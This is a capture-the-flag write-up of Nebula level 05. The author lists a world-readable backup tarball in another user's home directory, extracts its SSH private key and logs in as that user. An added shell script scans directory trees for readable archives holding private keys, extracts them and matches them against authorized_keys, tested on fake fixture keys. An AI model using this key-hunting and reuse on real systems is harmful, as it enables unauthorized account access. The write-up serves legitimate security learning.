Nebula Series - Level 05

04 May 2020


You need to secure your backups. The instructions for this level point us at weak directory permissions in the flag05 home directory. Easy enough; let's take a look at the target user's home directory:

level05@nebula:~$ ls -l /home/flag05
total 0

At first glance it doesn't seem like there's anything there, but if we include the -a flag to list hidden files (aka dotfiles) we see some interesting directories:

level05@nebula:~$ ls -la /home/flag05
total 9
drwxr-x--- 1 flag05 level05   80 2020-04-27 20:02 .
drwxr-xr-x 1 root   root      80 2012-08-27 07:18 ..
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
-rw------- 1 flag05 flag05    23 2020-04-27 20:02 .bash_history
-rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
drwx------ 2 flag05 flag05    60 2020-04-27 20:02 .cache
-rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh

That .backup looks promising. The home directory itself is drwxr-x---, so only flag05 and the level05 group (that's us) can enter it, but .backup is readable and traversable by everyone (drwxr-xr-x). Let's see what was backed up.

level05@nebula:~$ ls -la /home/flag05/.backup/
total 2
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
drwxr-x--- 1 flag05 level05   80 2020-04-27 20:02 ..
-rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz

A tarball… what's it hold? We can use tar with -t to list the files in an archive and -f to specify which archive (GNU tar detects the gzip compression on its own, so -z isn't required):

level05@nebula:~$ tar -tf /home/flag05/.backup/backup-19072011.tgz
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys

There they are! The keys to the castle! Let's extract them to a new ~/flag05keys directory in our home. Here, -x indicates we want to extract the files, -v enables verbose output, -f again identifies the archive we're working with, and -C allows us to specify where the extracted files should go. tar won't create the directory for us though, so we run mkdir ~/flag05keys first.

level05@nebula:~$ mkdir ~/flag05keys && tar -xvf /home/flag05/.backup/backup-19072011.tgz -C ~/flag05keys
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys

Let's check that the public key is the same as the one in .ssh/authorized_keys:

level05@nebula:~$ diff ~/flag05keys/.ssh/authorized_keys ~/flag05keys/.ssh/id_rsa.pub

No output indicates these files are identical. Strictly, that only shows the .pub file matches authorized_keys; it doesn't prove id_rsa is the matching private key (ssh-keygen -y -f id_rsa would derive the public key from it and settle that), but the login attempt is the real test anyway. If this "backup" is an accurate representation of our target's .ssh, we can connect as flag05 over ssh by providing this private key with -i. ssh refuses a private key that is group- or world-readable, so if the extracted id_rsa isn't mode 0600, chmod 600 it first:
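Since the whole level hinges on two checks (does a readable archive leak a private key, and is the recovered public key really the one in authorized_keys), here is a small shell script that does both. It is an added example written for this post, not code from the Nebula VM or from exploit-exercises.com: it builds its own throw-away home directory with constructed, fake key material, scans it for world-readable tarballs whose members look like private keys, extracts the key with a safe mode, and compares the public key to authorized_keys by key type and material rather than byte-for-byte, which goes a bit beyond the plain diff above. The function names (make_fixture, scan_for_key_backups, extract_key, pubkey_is_authorized) and the fixture paths are assumptions made for the example.

```sh
#!/bin/sh
# Added example, not from the Nebula writeup: hunt a directory tree for
# readable backup archives that contain SSH private keys, extract one safely,
# and check the recovered public key against authorized_keys by key material.
# Every path and key string below is a constructed fixture; nothing here is
# real Nebula data, and the function names are the example's own.

# Build a throw-away "home directory" shaped like /home/flag05 on the level:
# a world-readable .backup/ holding a tarball of a .ssh/ directory.
make_fixture() {
    fx_root=$(mktemp -d)
    fx_home="$fx_root/flag05"
    mkdir -p "$fx_home/.backup" "$fx_home/.ssh"
    # Dummy key material (constructed); the base64 blobs are not real keys.
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'QUFBQQ==' \
        '-----END OPENSSH PRIVATE KEY-----' > "$fx_home/.ssh/id_rsa"
    printf 'ssh-rsa AAAAB3NzaC1yc2EFAKEKEYDATA flag05@nebula\n' > "$fx_home/.ssh/id_rsa.pub"
    # Same key, different comment: a byte-for-byte diff against id_rsa.pub
    # would report a difference even though the key is authorised.
    printf 'ssh-rsa AAAAB3NzaC1yc2EFAKEKEYDATA backup-host\n' > "$fx_home/.ssh/authorized_keys"
    chmod 600 "$fx_home/.ssh/id_rsa"
    # Archive .ssh relative to the home directory, as backup-19072011.tgz was.
    (cd "$fx_home" && tar -czf .backup/backup-19072011.tgz .ssh)
    chmod 664 "$fx_home/.backup/backup-19072011.tgz"   # -rw-rw-r--, like the original
    rm -rf "$fx_home/.ssh"                              # only the backup copy survives
    echo "$fx_home"
}

# Report world-readable gzipped tarballs under a tree whose member names look
# like SSH private keys. Only names are inspected; nothing is extracted.
# Output: one "archive: member" line per hit.
scan_for_key_backups() {
    find "$1" -type f -perm -004 \( -name '*.tgz' -o -name '*.tar.gz' \) 2>/dev/null |
    while read -r archive; do
        tar -tzf "$archive" 2>/dev/null |
            grep -E '(^|/)(id_(rsa|dsa|ecdsa|ed25519)|[^/]*\.pem)$' |
            while read -r member; do
                echo "$archive: $member"
            done
    done
}

# Extract one archive into a fresh directory and tighten the private key's
# mode: ssh refuses a key that is group- or world-readable, and a key that was
# archived with a loose mode comes out loose. Prints the key's path.
extract_key() {
    archive="$1"; dest="$2"; member="$3"
    mkdir -p "$dest"          # tar -C will not create the directory for us
    tar -xzf "$archive" -C "$dest"
    chmod 600 "$dest/$member"
    echo "$dest/$member"
}

# Decide whether the key in a .pub file is authorised, comparing only the key
# type and base64 material. Comments differ freely and authorized_keys lines
# may start with options (command="...", from="..."), so a plain diff is the
# wrong tool: look for the type/material pair anywhere on each line.
pubkey_is_authorized() {
    pub="$1"; auth="$2"
    keytype=$(awk 'NR == 1 { print $1 }' "$pub")
    keydata=$(awk 'NR == 1 { print $2 }' "$pub")
    awk -v t="$keytype" -v d="$keydata" '
        /^#/ || NF < 2 { next }
        { for (i = 1; i < NF; i++) if ($i == t && $(i + 1) == d) found = 1 }
        END { exit !found }' "$auth"
}

# Walk the level's chain on the fixture.
fixture_home=$(make_fixture)
scan_for_key_backups "$fixture_home"
# prints "<fixture>/flag05/.backup/backup-19072011.tgz: .ssh/id_rsa"
keyfile=$(extract_key "$fixture_home/.backup/backup-19072011.tgz" \
                      "$fixture_home/flag05keys" .ssh/id_rsa)
if pubkey_is_authorized "$keyfile.pub" "${keyfile%/*}/authorized_keys"; then
    echo "id_rsa.pub is listed in authorized_keys; next: ssh -i $keyfile flag05@localhost"
fi
# Stricter, where ssh-keygen exists: derive the public key from the private
# key, which proves the pair belongs together instead of trusting id_rsa.pub.
#   ssh-keygen -y -f "$keyfile" | awk '{ print $1, $2 }'
rm -rf "${fixture_home%/*}"
```

Run as-is it reports the single hit in the fixture, extracts it and confirms the match. The deliberate difference from the diff used above is that authorized_keys entries often carry another comment or a leading options string such as command="...", and diff would call either of those a mismatch; comparing the type and material fields does not. Pointing scan_for_key_backups at /home (or / on a box you are assessing) is the general version of the "look for weak permissions" hint.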

level05@nebula:~$ ssh -i ~/flag05keys/.ssh/id_rsa flag05@localhost

The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/

    exploit-exercises.com/nebula


For level descriptions, please see the above URL.

To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.

Currently there are 20 levels (00 - 19).


Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

flag05@nebula:~$

It worked! Now that we’re user flag05, we can run getflag and move on.

flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

In Summary: